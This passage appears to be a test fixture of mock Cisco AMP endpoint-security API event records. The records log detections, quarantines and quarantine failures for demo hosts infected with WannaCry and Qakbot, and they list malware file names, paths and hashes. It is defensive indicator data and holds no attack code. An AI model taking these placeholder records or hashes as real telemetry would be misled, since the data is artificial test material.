Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
